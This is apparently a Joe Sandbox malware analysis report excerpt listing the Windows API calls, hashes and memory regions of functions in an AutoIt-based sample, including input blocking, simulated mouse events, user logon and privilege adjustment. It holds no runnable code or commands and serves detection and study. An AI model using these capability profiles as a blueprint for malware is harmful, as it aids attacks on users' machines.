                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                • String ID:
                                                • API String ID: 81990902-0
                                                • Opcode ID: a5e52e81d2763fd2a4a14d9ef91f4da6bd87d74bf7bdebc31c360153403ff87b
                                                • Instruction ID: df6b27dcb6995c55753c723e047c93bd6e1b2ea0c0b01c9f055140d9f2a10622
                                                • Opcode Fuzzy Hash: a5e52e81d2763fd2a4a14d9ef91f4da6bd87d74bf7bdebc31c360153403ff87b
                                                • Instruction Fuzzy Hash: 5EE0B672014611EEEB252B64FC09E777BAEEF44310714882DF49680470EF66ACA1DB94
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00798ED7,?,?,?,00000001), ref: 0079A2DA
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0079A2E3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: d2882755e8b234ae5a54a142f587dca1eb44d4e36a135d99b909151ca8de2e2c
                                                • Instruction ID: c86c6c654cecb55e989d2ed6a0d9d28f5884f137ee333d914fb3f5f45bd488ef
                                                • Opcode Fuzzy Hash: d2882755e8b234ae5a54a142f587dca1eb44d4e36a135d99b909151ca8de2e2c
                                                • Instruction Fuzzy Hash: CEB09231054208ABCA102B91EC09BA83F6AEF44AA2F408020F60D84060CF665450CA99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8953b4374d1d07391f760557d2521c65e1584041f02bd12fc3150cc07b2e79ca
                                                • Instruction ID: f8dab79dcd989986d0b825a28545258a47e7326407a8de1054b00d7f29e7d32e
                                                • Opcode Fuzzy Hash: 8953b4374d1d07391f760557d2521c65e1584041f02bd12fc3150cc07b2e79ca
                                                • Instruction Fuzzy Hash: 24320562D29F014DDB639634D832336A249BFB73E4F15D737E829F5AA6EB28D4834100
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c47d9014470771eb7955be7751e5871602dd9ced32511ec4af770dc3541a0841
                                                • Instruction ID: 7f9e84e0d98ee142d856fe0441cd40bb0a6bc732d49b3c51841feb6b1a3e2864
                                                • Opcode Fuzzy Hash: c47d9014470771eb7955be7751e5871602dd9ced32511ec4af770dc3541a0841
                                                • Instruction Fuzzy Hash: 7FB11021E2AF404DD36796398831336BA5CBFBB6D5F52D71BFC2670E22EB2181834141
                                                APIs
                                                • __time64.LIBCMT ref: 007D8944
                                                  • Part of subcall function 0079537A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007D9017,00000000,?,?,?,?,007D91C8,00000000,?), ref: 00795383
                                                  • Part of subcall function 0079537A: __aulldiv.LIBCMT ref: 007953A3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Time$FileSystem__aulldiv__time64
                                                • String ID:
                                                • API String ID: 2893107130-0
                                                • Opcode ID: 9fa157565e452f16b07cc6ab05eafb9196df1f4233f72ca4db5c1e01d12406fd
                                                • Instruction ID: 0a34062549f16e7fc98a539915184b25eaee07c5eb27c686cb714c8a35b523af
                                                • Opcode Fuzzy Hash: 9fa157565e452f16b07cc6ab05eafb9196df1f4233f72ca4db5c1e01d12406fd
                                                • Instruction Fuzzy Hash: 9821B472635510CBC729CF29D451B52B3E1EBA5310F288E6DE1E5CB2D0DA78B905CB54
                                                APIs
                                                • BlockInput.USER32(00000001), ref: 007E403A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: BlockInput
                                                • String ID:
                                                • API String ID: 3456056419-0
                                                • Opcode ID: 6ed8abaeb1aabff2cd6fdf7883b59f05991a6c31873106eab72b114a908953d0
                                                • Instruction ID: 37bcf88a93a763918961a4cf849d63810b1cd38b07380ab53becf8024209bcd0
                                                • Opcode Fuzzy Hash: 6ed8abaeb1aabff2cd6fdf7883b59f05991a6c31873106eab72b114a908953d0
                                                • Instruction Fuzzy Hash: C1E048312011149FCB10DF5AD404A9AFBE8AFA87A0F01C066FD49D7351DA74E841CB90
                                                APIs
                                                • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 007D4D1D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: mouse_event
                                                • String ID:
                                                • API String ID: 2434400541-0
                                                • Opcode ID: ffb55e89522f20621655d00b52a83c4f8e0ccce9d25bbd20726d77f16e63d6b3
                                                • Instruction ID: e71111325c7dad1571225b338003a96a6e5a7500fab7ebc2c0d33edffb77d397
                                                • Opcode Fuzzy Hash: ffb55e89522f20621655d00b52a83c4f8e0ccce9d25bbd20726d77f16e63d6b3
                                                • Instruction Fuzzy Hash: 70D09EA43646057BFC280B30DC1FB76123AF300796FA4454B770A9A3C5A8FC5841A439
                                                APIs
                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007C86B1), ref: 007C8A93
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: LogonUser
                                                • String ID:
                                                • API String ID: 1244722697-0
                                                • Opcode ID: ada548a1507e9b155c22a6f4f9225892dc479a249dd38c11ed93de64c7a4e4f4
                                                • Instruction ID: a7069c5790cca633f56aa038a197fbdb5761d4cb84eda0dc98882d36bf7f040c
                                                • Opcode Fuzzy Hash: ada548a1507e9b155c22a6f4f9225892dc479a249dd38c11ed93de64c7a4e4f4
                                                • Instruction Fuzzy Hash: ECD05E3226050EABEF018EA4DC01EBE3B69EB04B01F408111FE15C50A1CB75D835EB60
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,?), ref: 007B2171
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: NameUser
                                                • String ID:
                                                • API String ID: 2645101109-0
                                                • Opcode ID: 67b2b5c7b7a6b787d21cf9d11579e8a3b4191c2775e9cee1bcd26726f25f7e19
                                                • Instruction ID: 8133f64545b2d6513bc723c9b6a9645feacc375b27b43d73e924ba9dbf8d0e35
                                                • Opcode Fuzzy Hash: 67b2b5c7b7a6b787d21cf9d11579e8a3b4191c2775e9cee1bcd26726f25f7e19
                                                • Instruction Fuzzy Hash: 66C04CF1811109DBCB05DB90D998DFE77BCAB04304F508055E101F2100DB789B44CB71
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0079A2AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 199bae77c952c1063dca6b289d8a7823840934d806520333e2c57c1031870e58
                                                • Instruction ID: f5fcb1f8bf6b5f1228b8e4defa6afb61b61419c6b4a8142c82eb532e1c40cd3e
                                                • Opcode Fuzzy Hash: 199bae77c952c1063dca6b289d8a7823840934d806520333e2c57c1031870e58
                                                • Instruction Fuzzy Hash: BCA0113000020CABCA002B82EC088A8BFAEEE002A0B008020F80C800228B32A8208A88
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f5823957dd3f3be2d2e6ae43e9ad8471368659d155dc3d936a4b9faba5451c3
                                                • Instruction ID: 77cd9f3205f4a973738b977a82077137af85f10dfd67876793d6f92bf2de7b85
                                                • Opcode Fuzzy Hash: 5f5823957dd3f3be2d2e6ae43e9ad8471368659d155dc3d936a4b9faba5451c3
                                                • Instruction Fuzzy Hash: 232237B0640555CBCF78AA28C494B7CBBA1FF81344FA8816ED8529B591EB3DEDC1C742
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction ID: ef68cc63ed5108d6b2ddf479b873f396079f2b514726879cc292499f89ddaa56
                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction Fuzzy Hash: A2C195322161930ADF2D8639A43403EBFA15AA27B235A075DE4B3DB1D6EF28C535D620
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction ID: e86c2df0577c711e5ad7099a9f69d89110a3bb5a6b0945513acba94bde6748fe
                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction Fuzzy Hash: F5C1A43320619309DF6D463AE43403EBFA15BA27B235A076DE8B2DB1D5EF28C535D620
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction ID: 3b9c1d5ba01f9263a928f697834f6ec6dc3eba84cca7eb41550e883bc41f038c
                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction Fuzzy Hash: D8C1863221619309DF2D4639E43413EBFB25AA27B239A076DE4B3CB1C4EF28C574D620
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 007E7970
                                                • DeleteObject.GDI32(00000000), ref: 007E7982
                                                • DestroyWindow.USER32 ref: 007E7990
                                                • GetDesktopWindow.USER32 ref: 007E79AA
                                                • GetWindowRect.USER32(00000000), ref: 007E79B1
                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007E7AF2
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007E7B02
                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7B4A
                                                • GetClientRect.USER32(00000000,?), ref: 007E7B56
                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007E7B90
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7BB2
                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7BC5
                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7BD0
                                                • GlobalLock.KERNEL32(00000000), ref: 007E7BD9
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7BE8
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007E7BF1
                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7BF8
                                                • GlobalFree.KERNEL32(00000000), ref: 007E7C03
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7C15
                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00802CAC,00000000), ref: 007E7C2B
                                                • GlobalFree.KERNEL32(00000000), ref: 007E7C3B
                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007E7C61
                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007E7C80
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7CA2
                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7E8F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                • String ID: $AutoIt v3$DISPLAY$static
                                                • API String ID: 2211948467-2373415609
                                                • Opcode ID: d90cebe5d7808a9ef4d92fb264b5eb0fa2713fe500a242f449ef7353d6c5ea32
                                                • Instruction ID: 18f9c7818526551851a0429dd3f03da4249a9a32ccac39e834b9adb2a4e074fd
                                                • Opcode Fuzzy Hash: d90cebe5d7808a9ef4d92fb264b5eb0fa2713fe500a242f449ef7353d6c5ea32
                                                • Instruction Fuzzy Hash: 89025C71901109EFDB14DF69CC89EAE7BB9FF48310F148558F915AB2A1DB38AD01CB64
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,007FF910), ref: 007F3690
                                                • IsWindowVisible.USER32(?), ref: 007F36B4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: BuffCharUpperVisibleWindow
                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                • API String ID: 4105515805-45149045
                                                • Opcode ID: 2cc29c9a75d0898cc0b780cdb3c55a83293a598bb32f6609e13e5b66e1692f82
                                                • Instruction ID: b54d510cb593a4553d5b6475a665279da4a3e80581180c1d472d71f5ebbf4d15
                                                • Opcode Fuzzy Hash: 2cc29c9a75d0898cc0b780cdb3c55a83293a598bb32f6609e13e5b66e1692f82
                                                • Instruction Fuzzy Hash: 23D1A430214605DFCF14EF10C495ABA77A5EF95394F04845CFA869B3A2CB38EE4ACB91
                                                APIs
                                                • SetTextColor.GDI32(?,00000000), ref: 007FA662
                                                • GetSysColorBrush.USER32(0000000F), ref: 007FA693
                                                • GetSysColor.USER32(0000000F), ref: 007FA69F
                                                • SetBkColor.GDI32(?,000000FF), ref: 007FA6B9
                                                • SelectObject.GDI32(?,00000000), ref: 007FA6C8
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 007FA6F3
                                                • GetSysColor.USER32(00000010), ref: 007FA6FB
                                                • CreateSolidBrush.GDI32(00000000), ref: 007FA702
                                                • FrameRect.USER32(?,?,00000000), ref: 007FA711
                                                • DeleteObject.GDI32(00000000), ref: 007FA718
                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 007FA763
                                                • FillRect.USER32(?,?,00000000), ref: 007FA795
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007FA7C0
                                                  • Part of subcall function 007FA8FC: GetSysColor.USER32(00000012), ref: 007FA935
                                                  • Part of subcall function 007FA8FC: SetTextColor.GDI32(?,?), ref: 007FA939
                                                  • Part of subcall function 007FA8FC: GetSysColorBrush.USER32(0000000F), ref: 007FA94F
                                                  • Part of subcall function 007FA8FC: GetSysColor.USER32(0000000F), ref: 007FA95A
                                                  • Part of subcall function 007FA8FC: GetSysColor.USER32(00000011), ref: 007FA977
                                                  • Part of subcall function 007FA8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007FA985
                                                  • Part of subcall function 007FA8FC: SelectObject.GDI32(?,00000000), ref: 007FA996
                                                  • Part of subcall function 007FA8FC: SetBkColor.GDI32(?,00000000), ref: 007FA99F
                                                  • Part of subcall function 007FA8FC: SelectObject.GDI32(?,?), ref: 007FA9AC
                                                  • Part of subcall function 007FA8FC: InflateRect.USER32(?,000000FF,000000FF), ref: 007FA9CB
                                                  • Part of subcall function 007FA8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007FA9E2
                                                  • Part of subcall function 007FA8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 007FA9F7
                                                  • Part of subcall function 007FA8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007FAA1F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 3521893082-0
                                                • Opcode ID: fbb58ed55028ef455f44c9cb55ebf735eb187e933f4a574cd3dee3e91830c186
                                                • Instruction ID: 35fce2d94a5b6accdece0789bcc6c6c6b0beb1b54ac74f9b058e2d2a6e21b2a8
                                                • Opcode Fuzzy Hash: fbb58ed55028ef455f44c9cb55ebf735eb187e933f4a574cd3dee3e91830c186
                                                • Instruction Fuzzy Hash: 58918FB1008305FFC710AF64DC48E6B7BA9FF88321F104A29F666D62A0DB79D944CB56
                                                APIs
                                                • DestroyWindow.USER32(?,?,?), ref: 00772CA2
                                                • DeleteObject.GDI32(00000000), ref: 00772CE8
                                                • DeleteObject.GDI32(00000000), ref: 00772CF3
                                                • DestroyIcon.USER32(00000000,?,?,?), ref: 00772CFE
                                                • DestroyWindow.USER32(00000000,?,?,?), ref: 00772D09
                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 007AC5BB
                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007AC5F4
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007ACA1D
                                                  • Part of subcall function 00771B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00772036,?,00000000,?,?,?,?,007716CB,00000000,?), ref: 00771B9A
                                                • SendMessageW.USER32(?,00001053), ref: 007ACA5A
                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007ACA71
                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007ACA87
                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007ACA92
                                                Strings
                                                Memory Dump Source
